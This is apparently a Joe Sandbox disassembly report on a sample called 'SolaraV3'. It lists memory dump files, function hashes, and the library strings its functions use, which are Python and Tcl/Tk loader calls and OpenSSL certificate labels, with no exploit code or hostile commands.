Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
Instruction ID: 9e7a9b27032b7bafcd6f5aee83446e124d5b019504905dd3b80af30f6d4849f1
Opcode Fuzzy Hash: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
Instruction Fuzzy Hash: FBF0E27232C3E105DB95CA36A408FA92ED99391BC8F22C130E90DC3F64E92EC6018B40

Function 00007FFB0B815731 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
Instruction ID: 6b7871aa1870860f795d7ac2d265c5dfab1fd9b320d40608850dc01dc14de08c
Opcode Fuzzy Hash: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
Instruction Fuzzy Hash: ACE0DFB271D3A405E756CA336108E6A2E98A714B89F43D270D90EC3B65EC2ECA01CB80

Function 00007FF6DC705830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705840
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705852
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705889
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70589B
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058B4
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058C6
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058DF
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058F1
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70590D
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70591F
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70593B
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70594D
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705969
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70597B
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705997
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059A9
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059C5
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059D7

Strings

Py_Finalize, xrefs: 00007FF6DC7058D5, 00007FF6DC7058F7
Py_PreInitialize, xrefs: 00007FF6DC70595F, 00007FF6DC705981
PyMarshal_ReadObjectFromString, xrefs: 00007FF6DC705C6D, 00007FF6DC705C8F
PyConfig_SetWideStringList, xrefs: 00007FF6DC705A73, 00007FF6DC705A95
PyModule_GetDict, xrefs: 00007FF6DC705CC9, 00007FF6DC705CEB
PyUnicode_Replace, xrefs: 00007FF6DC705FD7, 00007FF6DC705FF9
Py_InitializeFromConfig, xrefs: 00007FF6DC705903, 00007FF6DC705925
Failed to get address for %hs, xrefs: 00007FF6DC705861
PyEval_EvalCode, xrefs: 00007FF6DC705BB5, 00007FF6DC705BD7
PyRun_SimpleStringFlags, xrefs: 00007FF6DC705E0B, 00007FF6DC705E2D
PyObject_Str, xrefs: 00007FF6DC705DAF, 00007FF6DC705DD1
PyUnicode_FromFormat, xrefs: 00007FF6DC705F4D, 00007FF6DC705F6F
Py_DecRef, xrefs: 00007FF6DC705836, 00007FF6DC705858
PyErr_NormalizeException, xrefs: 00007FF6DC705AFD, 00007FF6DC705B1F
PyImport_ImportModule, xrefs: 00007FF6DC705C3F, 00007FF6DC705C61
PyObject_SetAttrString, xrefs: 00007FF6DC705D81, 00007FF6DC705DA3
PyConfig_SetString, xrefs: 00007FF6DC705A45, 00007FF6DC705A67
PyUnicode_Join, xrefs: 00007FF6DC705FA9, 00007FF6DC705FCB
PyConfig_SetBytesString, xrefs: 00007FF6DC705A17, 00007FF6DC705A39
PySys_GetObject, xrefs: 00007FF6DC705E67, 00007FF6DC705E89
PyImport_ExecCodeModule, xrefs: 00007FF6DC705C11, 00007FF6DC705C33
PyStatus_Exception, xrefs: 00007FF6DC705E39, 00007FF6DC705E5B
PyUnicode_FromString, xrefs: 00007FF6DC705F7B, 00007FF6DC705F9D
PyConfig_Clear, xrefs: 00007FF6DC70598D, 00007FF6DC7059AF
PyConfig_Read, xrefs: 00007FF6DC7059E9, 00007FF6DC705A0B
PyUnicode_AsUTF8, xrefs: 00007FF6DC705EC3, 00007FF6DC705EE5
PyErr_Fetch, xrefs: 00007FF6DC705ACF, 00007FF6DC705AF1
PyMem_RawFree, xrefs: 00007FF6DC705C9B, 00007FF6DC705CBD
PyObject_CallFunction, xrefs: 00007FF6DC705CF7, 00007FF6DC705D19
Py_ExitStatusException, xrefs: 00007FF6DC7058AA, 00007FF6DC7058CC
Py_IsInitialized, xrefs: 00007FF6DC705931, 00007FF6DC705953
PyErr_Print, xrefs: 00007FF6DC705B59, 00007FF6DC705B7B
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6DC705DDD, 00007FF6DC705DFF
PyConfig_InitIsolatedConfig, xrefs: 00007FF6DC7059BB, 00007FF6DC7059DD
GetProcAddress, xrefs: 00007FF6DC705868
PyErr_Occurred, xrefs: 00007FF6DC705B2B, 00007FF6DC705B4D
PyObject_GetAttrString, xrefs: 00007FF6DC705D53, 00007FF6DC705D75
Py_DecodeLocale, xrefs: 00007FF6DC70587F, 00007FF6DC7058A1
PyErr_Clear, xrefs: 00007FF6DC705AA1, 00007FF6DC705AC3
PyUnicode_DecodeFSDefault, xrefs: 00007FF6DC705F1F, 00007FF6DC705F41
PySys_SetObject, xrefs: 00007FF6DC705E95, 00007FF6DC705EB7
PyObject_CallFunctionObjArgs, xrefs: 00007FF6DC705D25, 00007FF6DC705D47
PyUnicode_Decode, xrefs: 00007FF6DC705EF1, 00007FF6DC705F13
PyImport_AddModule, xrefs: 00007FF6DC705BE3, 00007FF6DC705C05
PyErr_Restore, xrefs: 00007FF6DC705B87, 00007FF6DC705BA9

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 5bd0f72d8adc669c3cb0b94db63bc82d810b916f619e63c21d10af3535aa785f
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: 5322B364A0DB0F96FE659B56A86057CA3B0FF18781F545037C81F822A0EF3DB16B9348

Function 00007FF6DC7076C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6DC7076D7
GetLastError.KERNEL32 ref: 00007FF6DC7076E9
GetProcAddress.KERNEL32 ref: 00007FF6DC707725
GetLastError.KERNEL32 ref: 00007FF6DC707737
GetProcAddress.KERNEL32 ref: 00007FF6DC707750
GetLastError.KERNEL32 ref: 00007FF6DC707762
GetProcAddress.KERNEL32 ref: 00007FF6DC70777B
GetLastError.KERNEL32 ref: 00007FF6DC70778D
GetProcAddress.KERNEL32 ref: 00007FF6DC7077A9
GetLastError.KERNEL32 ref: 00007FF6DC7077BB
GetProcAddress.KERNEL32 ref: 00007FF6DC7077D7
GetLastError.KERNEL32 ref: 00007FF6DC7077E9
GetProcAddress.KERNEL32 ref: 00007FF6DC707805
GetLastError.KERNEL32 ref: 00007FF6DC707817
GetProcAddress.KERNEL32 ref: 00007FF6DC707833
GetLastError.KERNEL32 ref: 00007FF6DC707845
GetProcAddress.KERNEL32 ref: 00007FF6DC707861
GetLastError.KERNEL32 ref: 00007FF6DC707873

Strings

Tcl_SetVar2, xrefs: 00007FF6DC707A51, 00007FF6DC707A73
Tcl_CreateObjCommand, xrefs: 00007FF6DC707A7F, 00007FF6DC707AA1
Tcl_FindExecutable, xrefs: 00007FF6DC707746, 00007FF6DC707768
Tcl_ConditionWait, xrefs: 00007FF6DC707999, 00007FF6DC7079BB
Tcl_EvalEx, xrefs: 00007FF6DC707BC1, 00007FF6DC707BE3
Tcl_GetString, xrefs: 00007FF6DC707AAD, 00007FF6DC707ACF
Tcl_DoOneEvent, xrefs: 00007FF6DC707771, 00007FF6DC707793
Tcl_CreateThread, xrefs: 00007FF6DC707829, 00007FF6DC70784B
Tcl_NewStringObj, xrefs: 00007FF6DC707ADB, 00007FF6DC707AFD
Tcl_MutexFinalize, xrefs: 00007FF6DC70790F, 00007FF6DC707931
Failed to get address for %hs, xrefs: 00007FF6DC7076F8
Tk_GetNumMainWindows, xrefs: 00007FF6DC707CA7, 00007FF6DC707CC9
Tcl_GetCurrentThread, xrefs: 00007FF6DC707857, 00007FF6DC707879
Tcl_ThreadQueueEvent, xrefs: 00007FF6DC7079C7, 00007FF6DC7079E9
Tcl_ThreadAlert, xrefs: 00007FF6DC7079F5, 00007FF6DC707A17
Tk_Init, xrefs: 00007FF6DC707C79, 00007FF6DC707C9B
Tcl_MutexUnlock, xrefs: 00007FF6DC7078E1, 00007FF6DC707903
Tcl_DeleteInterp, xrefs: 00007FF6DC7077FB, 00007FF6DC70781D
Tcl_GetVar2, xrefs: 00007FF6DC707A23, 00007FF6DC707A45
Tcl_ConditionNotify, xrefs: 00007FF6DC70796B, 00007FF6DC70798D
Tcl_Alloc, xrefs: 00007FF6DC707C1D, 00007FF6DC707C3F
Tcl_SetVar2Ex, xrefs: 00007FF6DC707B37, 00007FF6DC707B59
Tcl_CreateInterp, xrefs: 00007FF6DC70771B, 00007FF6DC70773D
GetProcAddress, xrefs: 00007FF6DC7076FF
Tcl_FinalizeThread, xrefs: 00007FF6DC7077CD, 00007FF6DC7077EF
Tcl_Free, xrefs: 00007FF6DC707C4B, 00007FF6DC707C6D
Tcl_Finalize, xrefs: 00007FF6DC70779F, 00007FF6DC7077C1
Tcl_GetObjResult, xrefs: 00007FF6DC707B65, 00007FF6DC707B87
Tcl_EvalFile, xrefs: 00007FF6DC707B93, 00007FF6DC707BB5
Tcl_NewByteArrayObj, xrefs: 00007FF6DC707B09, 00007FF6DC707B2B
Tcl_JoinThread, xrefs: 00007FF6DC707885, 00007FF6DC7078A7
Tcl_MutexLock, xrefs: 00007FF6DC7078B3, 00007FF6DC7078D5
Tcl_Init, xrefs: 00007FF6DC7076D0, 00007FF6DC7076EF
Tcl_EvalObjv, xrefs: 00007FF6DC707BEF, 00007FF6DC707C11
Tcl_ConditionFinalize, xrefs: 00007FF6DC70793D, 00007FF6DC70795F

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 91f8c131e1af8d518885a39eb8fd539c91bda2667e277093d0ec9d07a938cc97
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 7A029524A0EB0FD5FA359B56E8645BCA3A1AF18745F941037D82E82260EF3CB56BD704

Function 00007FFB0B9C5600 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 223COMMON

Download Yara Rule

APIs

00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5651
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5668
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C567F
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C56B2
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C56FB
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C572F
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5781
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5794
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C57AB
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C57BE
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C57D5
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C57E8
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C57FF
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5812
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5825
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5838
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C584B
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C5897
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFB0B9C6243,?,?,?,?,?,?,?,?,00007FFB0B9C425B), ref: 00007FFB0B9C58C2

Strings

NEW CERTIFICATE REQUEST, xrefs: 00007FFB0B9C57CB
CERTIFICATE REQUEST, xrefs: 00007FFB0B9C57DE
ENCRYPTED PRIVATE KEY, xrefs: 00007FFB0B9C565E
DH PARAMETERS, xrefs: 00007FFB0B9C578A
X9.42 DH PARAMETERS, xrefs: 00007FFB0B9C5777
CERTIFICATE, xrefs: 00007FFB0B9C57B4, 00007FFB0B9C57F5, 00007FFB0B9C5841, 00007FFB0B9C58B8
PKCS7, xrefs: 00007FFB0B9C5852
PRIVATE KEY, xrefs: 00007FFB0B9C5675, 00007FFB0B9C56A4
PARAMETERS, xrefs: 00007FFB0B9C56F1, 00007FFB0B9C5721
X509 CERTIFICATE, xrefs: 00007FFB0B9C57A1, 00007FFB0B9C581B
CMS, xrefs: 00007FFB0B9C58C7
PKCS #7 SIGNED DATA, xrefs: 00007FFB0B9C588D
TRUSTED CERTIFICATE, xrefs: 00007FFB0B9C5808, 00007FFB0B9C582E
ANY PRIVATE KEY, xrefs: 00007FFB0B9C5647

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007B5630
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
API String ID: 2248877218-1119032718
Opcode ID: 3af54960f1234cedf813c05304838762c682ff4381afd251c87a5d5e4fffb560
Instruction ID: a686ffe5bd600f760e85222fd788fdfadf1c3cd7153306397bbf5682e3071a96
Opcode Fuzzy Hash: 3af54960f1234cedf813c05304838762c682ff4381afd251c87a5d5e4fffb560
Instruction Fuzzy Hash: 5A918DD1E0C74340FE919735DA22AB92691AF66BD0F85D131DD4FC62F6EE2CF9418604

Function 00007FFB0B811C21 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 267COMMON

Download Yara Rule

APIs

00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B8C1893
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B8C19BC
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B8C19CF
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B8C1B6C
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B8C1B7F

Strings

boundary, xrefs: 00007FFB0B8C18A4
application/pkcs7-mime, xrefs: 00007FFB0B8C1B75
multipart/signed, xrefs: 00007FFB0B8C1889
application/x-pkcs7-signature, xrefs: 00007FFB0B8C19B2
application/pkcs7-signature, xrefs: 00007FFB0B8C19C5
content-type, xrefs: 00007FFB0B8C1844
..\s\crypto\asn1\asn_mime.c, xrefs: 00007FFB0B8C180B, 00007FFB0B8C194D, 00007FFB0B8C19E5, 00007FFB0B8C1A61, 00007FFB0B8C1AE5, 00007FFB0B8C1B17, 00007FFB0B8C1B95, 00007FFB0B8C1C1C
type: , xrefs: 00007FFB0B8C19FE, 00007FFB0B8C1BAE
application/x-pkcs7-mime, xrefs: 00007FFB0B8C1B62

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007B5630
String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
API String ID: 2248877218-3630080479
Opcode ID: b020904c3bad4ffa821751f85af9fd884556f26034922e71bf6aa46b876580fc
Instruction ID: 9b2cf6b213ebe530b31058287d71d852fd155c3fe2e48cd220785bec46eee463
Opcode Fuzzy Hash: b020904c3bad4ffa821751f85af9fd884556f26034922e71bf6aa46b876580fc
